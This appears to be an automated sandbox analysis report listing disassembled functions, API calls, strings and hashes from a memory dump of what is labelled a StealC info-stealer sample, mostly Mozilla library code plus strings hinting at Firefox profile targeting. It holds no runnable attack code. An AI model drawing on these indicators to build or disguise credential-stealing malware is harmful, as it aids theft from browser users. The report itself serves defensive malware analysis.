MozillaWindowClass, xrefs: 6BF8E21F, 6BF8EDCD
|Theme, xrefs: 6BF8EBE8
MOZ_APP_SILENT_START, xrefs: 6BF8DF69
(, xrefs: 6BF8EEDD
MOZ_SAFE_MODE_RESTART, xrefs: 6BF8DF4E
[General], xrefs: 6BF8EA02
|SearchbarCSSSpan, xrefs: 6BF8E5EA
MAB, xrefs: 6BF8EC69
|Width, xrefs: 6BF8E359
MOZ_RESET_PROFILE_RESTART, xrefs: 6BF8DF84
|Maximized, xrefs: 6BF8E433
|ScreenX, xrefs: 6BF8E27F
mjj, xrefs: 6BF8EC5A
StartWithLastProfile=, xrefs: 6BF8EAE0
MAB, xrefs: 6BF8EC6E
XRE_PROFILE_PATH, xrefs: 6BF8DFBA
ker.exeRuntimeBroker.exesvchost.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYma, xrefs: 6BF8ED15, 6BF8ED34

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: freegetenv$moz_xmalloc$ConditionMaskModule$HandleProcess$Currentmemcpymemsetstrncmp$??0ios_base@std@@??1ios_base@std@@?fail@ios_base@std@@AddressCacheEnabled@mozilla@@FileInfoLibraryLoadNameNow@PlusProcStamp@mozilla@@TerminateThunk@mozilla@@TimeV12@_VerifyVersion_invalid_parameter_noinfo_noreturn_stricmpstrcmpwcslen
String ID: ($3*+$MAB$MAB$MAB$MOZ_APP_SILENT_START$MOZ_HEADLESS$MOZ_RESET_PROFILE_RESTART$MOZ_SAFE_MODE_RESTART$MOZ_SKELETON_UI_RESTARTING$MozillaWindowClass$StartWithLastProfile=$XRE_PROFILE_PATH$[General]$\Mozilla\Firefox\profiles.ini$ker.exeRuntimeBroker.exesvchost.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYmaZfECuwIMb.exelJorLYvgYma$marionette$mjj$|CssToDevPixelScaling$|Enabled$|Flags$|Height$|Maximized$|Progress$|ScreenX$|ScreenY$|SearchbarCSSSpan$|SpringsCSSSpan$|Theme$|UrlbarCSSSpan$|Width$
API String ID: 493732560-839859028
Opcode ID: 885e814e08c786612205593653f689377256323a4735e09b7c9138030906e451
Instruction ID: d47a64afd842c0dfc4508507920060ddb2574de43bd2c3d6a0e50bd184cb3160
Opcode Fuzzy Hash: 885e814e08c786612205593653f689377256323a4735e09b7c9138030906e451
Instruction Fuzzy Hash: D7D26D76A183819FD720CF24C884B9FB7F1BFC9308F04491DE98997261DB799949CB92

Function 6BF71AF0 Relevance: 83.8, APIs: 36, Strings: 10, Instructions: 3305COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6BF71C36
LeaveCriticalSection.KERNEL32(?), ref: 6BF71CAD
memcpy.VCRUNTIME140(?,?,?), ref: 6BF71CCA
EnterCriticalSection.KERNEL32(?), ref: 6BF71CFB
memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6BF71D42
LeaveCriticalSection.KERNEL32(?), ref: 6BF71DE0
EnterCriticalSection.KERNEL32(?), ref: 6BF71E75
memset.VCRUNTIME140(?,000000E5,?), ref: 6BF72901
EnterCriticalSection.KERNEL32(6BFDE744), ref: 6BF73FD6
LeaveCriticalSection.KERNEL32(6BFDE744), ref: 6BF74011
LeaveCriticalSection.KERNEL32(?), ref: 6BF74066
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF7406C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6BF74088
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6BF74095

Strings

Compile-time page size does not divide the runtime one., xrefs: 6BF74550
MOZ_RELEASE_ASSERT(mNode), xrefs: 6BF74371, 6BF74438, 6BF7445A
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6BF743CA
: (malloc) Unsupported character in malloc options: ', xrefs: 6BF7460C
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6BF743DF
MALLOC_OPTIONS, xrefs: 6BF7420C
MOZ_CRASH(), xrefs: 6BF7455A
<jemalloc>, xrefs: 6BF7454B, 6BF745FB
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6BF743F4
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6BF743B5

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave$K@1@Maybe@_RandomUint64@mozilla@@memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 2200976442-4173974723
Opcode ID: 061d2263a5c26bbabd8b6510d09030823c49d2a1f46dcce6585ee9dad6338ecc
Instruction ID: fee0538f8521c8bf32962b5320aced0db0a7038028bc99c1370aea9e732d60fc
Opcode Fuzzy Hash: 061d2263a5c26bbabd8b6510d09030823c49d2a1f46dcce6585ee9dad6338ecc
Instruction Fuzzy Hash: B653AF73A146018FD724DF28D450615FBE1BF86724F29C6EEE8698B3A1D736E841CB81

Function 6BF5F380 Relevance: 74.7, APIs: 49, Instructions: 1206memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6BF5F43A
__Init_thread_footer.LIBCMT ref: 6BF5F44D
EnterCriticalSection.KERNEL32(6BFDF83C), ref: 6BF5F492
moz_xmalloc.MOZGLUE(0000000C), ref: 6BF5F4BB
moz_xmalloc.MOZGLUE(00000014), ref: 6BF5F4E8
GetSystemInfo.KERNEL32(?), ref: 6BF5F599
__Init_thread_footer.LIBCMT ref: 6BF5F5AC
GetCurrentProcess.KERNEL32 ref: 6BF5F5D0
VirtualAlloc.KERNEL32(00000000,00000000,00002000,00000001), ref: 6BF5F5EB
LeaveCriticalSection.KERNEL32(6BFDF83C), ref: 6BF5F606
EnterCriticalSection.KERNEL32(6BFDF83C), ref: 6BF5F63D
VirtualAlloc.KERNEL32(?,00001000,00000020), ref: 6BF5F69E
VirtualProtect.KERNEL32(00000004,00000080,00000040,?), ref: 6BF5F705
LeaveCriticalSection.KERNEL32(6BFDF83C), ref: 6BF5F7A1
EncodePointer.KERNEL32(?), ref: 6BF5F824
EncodePointer.KERNEL32(?), ref: 6BF5F88A
memcpy.VCRUNTIME140(00000000,00000000,00000002), ref: 6BF5FA1A
memcpy.VCRUNTIME140(?,?,?), ref: 6BF5FBE2
GetCurrentProcess.KERNEL32 ref: 6BF5FBEA
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6BF5FBF5
VirtualProtect.KERNEL32(00000000,000000FF,?,?), ref: 6BF5FCA3
VirtualProtect.KERNEL32(00000000,00000000,?,?), ref: 6BF5FCF0
InitializeCriticalSectionEx.KERNEL32(6BFDF83C,00000FA0,01000000), ref: 6BF5FD32
__Init_thread_footer.LIBCMT ref: 6BF5FD44
InitializeCriticalSectionEx.KERNEL32(6BFDF83C,00000FA0,01000000), ref: 6BF5FD7A
__Init_thread_footer.LIBCMT ref: 6BF5FD8C
GetSystemInfo.KERNEL32(?), ref: 6BF5FDB8
__Init_thread_footer.LIBCMT ref: 6BF5FDCB
GetSystemInfo.KERNEL32(?), ref: 6BF5FDFA
__Init_thread_footer.LIBCMT ref: 6BF5FE0D
GetSystemInfo.KERNEL32(?), ref: 6BF5FE3C
__Init_thread_footer.LIBCMT ref: 6BF5FE4F
moz_xmalloc.MOZGLUE(00000014), ref: 6BF6001F
free.MOZGLUE(?), ref: 6BF6004C

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Init_thread_footer$CriticalSection$InfoSystemVirtual$Protectmoz_xmalloc$AllocCurrentEncodeEnterInitializeLeavePointerProcessmemcpy$CacheFlushInstructionfree
String ID:
API String ID: 1298523428-0
Opcode ID: 66e6479ec9eb0ecb980dbda0f3ca11532e6855f49c47c99a632d75407f654234
Instruction ID: 6289c685c28ecef47e507bd2947b325107fd69e16a4b5c105e18c31c906d049e
Opcode Fuzzy Hash: 66e6479ec9eb0ecb980dbda0f3ca11532e6855f49c47c99a632d75407f654234
Instruction Fuzzy Hash: 4BA20373A08341DFDB50CF38C884B5AB7E2AF96304F1489ADE895872B1D779E855CB42

Function 6BF99A60 Relevance: 70.4, APIs: 27, Strings: 12, Instructions: 2107timethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BF64A68), ref: 6BF9945E
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BF99470
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BF99482
Part of subcall function 6BF99420: __Init_thread_footer.LIBCMT ref: 6BF9949F

GetCurrentThreadId.KERNEL32 ref: 6BF99A95
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF99A9D

Part of subcall function 6BF994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BF994EE
Part of subcall function 6BF994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BF99508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BF99ACC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BF99BA7
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BF99BB8
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BF99BC9
GetSystemTime.KERNEL32(?,00000000), ref: 6BF99C39
SystemTimeToFileTime.KERNEL32(?,?), ref: 6BF99C45
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BF99C61
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(00000000,?,2AC18000,?,0000000A,00000000), ref: 6BF99CC6
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,2AC18000,?,0000000A,00000000), ref: 6BF99D31
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000,2AC18000,?,0000000A,00000000), ref: 6BF99D41
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(00000000,?,00000000,00000000,2AC18000,?,0000000A,00000000), ref: 6BF99DDC
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BF99E45
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,?), ref: 6BF99E81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000,?), ref: 6BF99E97

Part of subcall function 6BF5EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF5EB83

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE(00000000,00000000,?), ref: 6BF99F61
moz_xmalloc.MOZGLUE(00000028), ref: 6BF9B26A

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

memcpy.VCRUNTIME140(?,?,?), ref: 6BF9B331
?Stream@MarkerSchema@mozilla@@QHAEXAAVJSONWriter@2@ABV?$Span@$$CBD$0PPPPPPPP@@2@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,6BFCD734,?,?,?,6BFCD734,?,?), ref: 6BF9B38D
free.MOZGLUE(?,?,?,?,6BFCD734,?,?,?,6BFCD734,?,?,?,6BFCD734,?,?,?), ref: 6BF9B406
GetCurrentThreadId.KERNEL32 ref: 6BF9B41D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF9B5A4

Part of subcall function 6BF54310: moz_xmalloc.MOZGLUE(00000010,?,6BF542D2), ref: 6BF5436A
Part of subcall function 6BF54310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6BF542D2), ref: 6BF54387

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF9B695
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BF9B6F1
free.MOZGLUE(-00000004), ref: 6BF9B7AC

Strings

stackwalk, xrefs: 6BF9B46C
[I %d/%d] locked_profiler_stream_json_for_this_process, xrefs: 6BF99AA5
Test, xrefs: 6BF9A1EC
purple, xrefs: 6BF9A2E2, 6BF9AE13
green, xrefs: 6BF9A898, 6BF9AD4B
name, xrefs: 6BF9A030, 6BF9A0FF, 6BF9A1F8, 6BF9A2C5, 6BF9A422, 6BF9A5C8, 6BF9A7AA, 6BF9A87B, 6BF9AA00, 6BF9AACC, 6BF9AB99, 6BF9AC61, 6BF9AD2E, 6BF9ADF6, 6BF9AEC3, 6BF9AF90, 6BF9B05C, 6BF9B177
orange, xrefs: 6BF9A5E5, 6BF9ABB6, 6BF9B079
subcategories, xrefs: 6BF9A076, 6BF9A141, 6BF9A242, 6BF9A310, 6BF9A46D, 6BF9A613, 6BF9A7F5, 6BF9A8C1, 6BF9AA46, 6BF9AB13, 6BF9ABE0, 6BF9ACA8, 6BF9AD70, 6BF9AE3D, 6BF9AF0A, 6BF9AFD6, 6BF9B0A3, 6BF9B1B9
yellow, xrefs: 6BF9A43F, 6BF9AAE9
lightblue, xrefs: 6BF9A7C7, 6BF9AEE0
color, xrefs: 6BF9A05D, 6BF9A128, 6BF9A225, 6BF9A2F3, 6BF9A450, 6BF9A5F6, 6BF9A7D8, 6BF9A8A4, 6BF9AA29, 6BF9AAFA, 6BF9ABC7, 6BF9AC8F, 6BF9AD57, 6BF9AE24, 6BF9AEF1, 6BF9AFBD, 6BF9B08A, 6BF9B1A0
Other, xrefs: 6BF9A0A1, 6BF9A0EE, 6BF9A16C, 6BF9A33B, 6BF9A498, 6BF9A63E, 6BF9A820, 6BF9A8EC, 6BF9AA71, 6BF9AB3E, 6BF9AC0B, 6BF9ACD3, 6BF9AD9B, 6BF9AE68, 6BF9AF35, 6BF9B001, 6BF9B0CE, 6BF9B1E4

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$free$?profiler_time@baseprofiler@mozilla@@getenv$BaseCurrentDurationPlatformSeconds@SystemThreadUtils@mozilla@@memcpymoz_xmalloc$FileInit_thread_footerMarkerNow@P@@2@@Schema@mozilla@@Span@$$Stamp@mozilla@@Stream@Unothrow_t@std@@@V12@_Writer@2@__acrt_iob_func__ehfuncinfo$??2@__stdio_common_vfprintf_getpidmalloc
String ID: Other$Test$[I %d/%d] locked_profiler_stream_json_for_this_process$color$green$lightblue$name$orange$purple$stackwalk$subcategories$yellow
API String ID: 2456888257-1590927224
Opcode ID: 285fe8d6622c68fa88a99d32d1e37024ad57c900d0bba0c4d6a31ae95fd308d4
Instruction ID: ccd4716aa7b89ad2acd6fbd5d0b0c4dc170fb5fc331369d99dda704ca39a420b
Opcode Fuzzy Hash: 285fe8d6622c68fa88a99d32d1e37024ad57c900d0bba0c4d6a31ae95fd308d4
Instruction Fuzzy Hash: C6F26FB26007429FD7209F38885175FBBE6EFD9384F14493DE499CB360EB3998458B92

Function 6BF860A0 Relevance: 50.1, APIs: 22, Strings: 6, Instructions: 1142COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BFDE7DC), ref: 6BF860C9
LeaveCriticalSection.KERNEL32(6BFDE7DC), ref: 6BF8610D
EnterCriticalSection.KERNEL32(?), ref: 6BF8618C
LeaveCriticalSection.KERNEL32(?), ref: 6BF861F9

Strings

Compile-time page size does not divide the runtime one., xrefs: 6BF86AAE
MOZ_RELEASE_ASSERT(mNode), xrefs: 6BF86BC7, 6BF86F97, 6BF86FB2
: (malloc) Unsupported character in malloc options: ', xrefs: 6BF86B6A
MALLOC_OPTIONS, xrefs: 6BF86888
MOZ_CRASH(), xrefs: 6BF86AB8
<jemalloc>, xrefs: 6BF86AA9, 6BF86B59

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3168844106-429003945
Opcode ID: d71cb5108b8e2eabff04df4287f8edbe954675777ed2ccf0c61c02d352852fa9
Instruction ID: 8a514ea233d092d2fdf2afee4186e97a6aadfbf6f0b469419c26ab9fc3fa59f4
Opcode Fuzzy Hash: d71cb5108b8e2eabff04df4287f8edbe954675777ed2ccf0c61c02d352852fa9
Instruction Fuzzy Hash: EAA2BB72A246119FD708CF28C540715BBF2FF86724F19C6ADE8698B3A1D779E841CB81

Function 6BF6CAB0 Relevance: 46.6, APIs: 20, Strings: 6, Instructions: 1098COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6BF6CB49
LeaveCriticalSection.KERNEL32(?), ref: 6BF6CBB6
LeaveCriticalSection.KERNEL32(?), ref: 6BF6D151
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF6D157
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6BF6D177
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6BF6D184
AcquireSRWLockExclusive.KERNEL32(6BFDE804), ref: 6BF6D1EC
GetSystemInfo.KERNEL32(?), ref: 6BF6D237
__Init_thread_footer.LIBCMT ref: 6BF6D24A
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6BFDE810,00000040), ref: 6BF6D274
InitializeCriticalSectionAndSpinCount.KERNEL32(6BFDE7B8,00001388), ref: 6BF6D2DD
InitializeCriticalSectionAndSpinCount.KERNEL32(6BFDE744,00001388), ref: 6BF6D2F3
InitializeCriticalSectionAndSpinCount.KERNEL32(6BFDE784,00001388), ref: 6BF6D319
InitializeCriticalSectionAndSpinCount.KERNEL32(6BFDE7DC,00001388), ref: 6BF6D33A
InitializeCriticalSectionAndSpinCount.KERNEL32(6BFDE768,00001388), ref: 6BF6D37C
memset.VCRUNTIME140(00000000,00000000,00004000), ref: 6BF6D39E
ReleaseSRWLockExclusive.KERNEL32(6BFDE804), ref: 6BF6D3BF

Part of subcall function 6BF6D960: EnterCriticalSection.KERNEL32(?), ref: 6BF6D999
Part of subcall function 6BF6D960: EnterCriticalSection.KERNEL32(6BFDE7B8), ref: 6BF6DA13

Strings

Compile-time page size does not divide the runtime one., xrefs: 6BF6D415
MOZ_RELEASE_ASSERT(mNode), xrefs: 6BF6D52E, 6BF6D907, 6BF6D922
: (malloc) Unsupported character in malloc options: ', xrefs: 6BF6D4D1
MALLOC_OPTIONS, xrefs: 6BF6D26F
MOZ_CRASH(), xrefs: 6BF6D41F
<jemalloc>, xrefs: 6BF6D410, 6BF6D4C0

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$CountInitializeSpin$Enter$ExclusiveK@1@LeaveLockMaybe@_RandomUint64@mozilla@@$AcquireEnvironmentInfoInit_thread_footerReleaseSystemVariable_errnomemset
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3908130931-429003945
Opcode ID: e337caa1b8fba5c2bdc9d64d145ca1322de0639be11134d349384bccb2abb348
Instruction ID: 70cc2eb86b0ff08aac898428203c2fb9fcdb0d82240575f703ac19b935c925db
Opcode Fuzzy Hash: e337caa1b8fba5c2bdc9d64d145ca1322de0639be11134d349384bccb2abb348
Instruction Fuzzy Hash: ED92CE76A546018FD708CF28C540715BBE1FF85764F29C6ADECA98B3A1E739E841CB81

Function 6BF6D960 Relevance: 41.6, APIs: 22, Strings: 4, Instructions: 2648memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6BF6D999
EnterCriticalSection.KERNEL32(6BFDE7B8), ref: 6BF6DA13
LeaveCriticalSection.KERNEL32(6BFDE7B8), ref: 6BF6DB51
VirtualAlloc.KERNEL32 ref: 6BF6DB65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 6BF6DB8F
VirtualAlloc.KERNEL32 ref: 6BF6DBB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6BF6DBD1
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 6BF6DBEC
LeaveCriticalSection.KERNEL32(6BFDE7B8), ref: 6BF6E6B4
EnterCriticalSection.KERNEL32(6BFDE784), ref: 6BF6E6BF
LeaveCriticalSection.KERNEL32(6BFDE7B8), ref: 6BF6E915
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6BF6E928
EnterCriticalSection.KERNEL32(6BFDE768), ref: 6BF6E946
LeaveCriticalSection.KERNEL32(6BFDE768), ref: 6BF6E96A
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6BF6EA04

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6BF6EF0B, 6BF6F0B4, 6BF6F5A4, 6BF6FCB8
MOZ_CRASH(), xrefs: 6BF6EE5B
: (malloc) Error in VirtualFree(), xrefs: 6BF6E2A6, 6BF6E2BA, 6BF6E2F7
<jemalloc>, xrefs: 6BF6E2A1, 6BF6E2B5, 6BF6E2F2

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Virtual$AllocEnterLeave$Free
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 300175890-3870822112
Opcode ID: 6bd5171633399cfc022690e9f50c9d93908bd612c0e2230b188cade2b02e25b8
Instruction ID: 0bb06ce445e08d1c505292dbe91e58a7c7838740ac6124bf48ac42c2baaa0b1b
Opcode Fuzzy Hash: 6bd5171633399cfc022690e9f50c9d93908bd612c0e2230b188cade2b02e25b8
Instruction Fuzzy Hash: 9C339073A14B018FD314CF28C990715B7E1BF85764F28C6ADE8698B3A5E779E841CB81

Function 6BF9E2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6BF9E2A6), ref: 6BF9E35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6BF9E2A6), ref: 6BF9E386
GetCurrentThreadId.KERNEL32 ref: 6BF9E3E4
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6BF9E4AB
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9E4F5
GetCurrentThreadId.KERNEL32 ref: 6BF9E577
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9E584
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BF9E8A6

Part of subcall function 6BF5B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BF5B7CF
Part of subcall function 6BF5B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BF5B808

Part of subcall function 6BFAB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6BFD0FB6,00000000,?,?,6BF9E69E), ref: 6BFAB830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6BF9E6DA

Part of subcall function 6BFAB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6BFAB916
Part of subcall function 6BFAB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6BFAB94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF9E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF9E883

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6BF9E826, 6BF9E850
MOZ_PROFILER_STARTUP, xrefs: 6BF9E5A1, 6BF9E5CC, 6BF9E5FF, 6BF9E62A
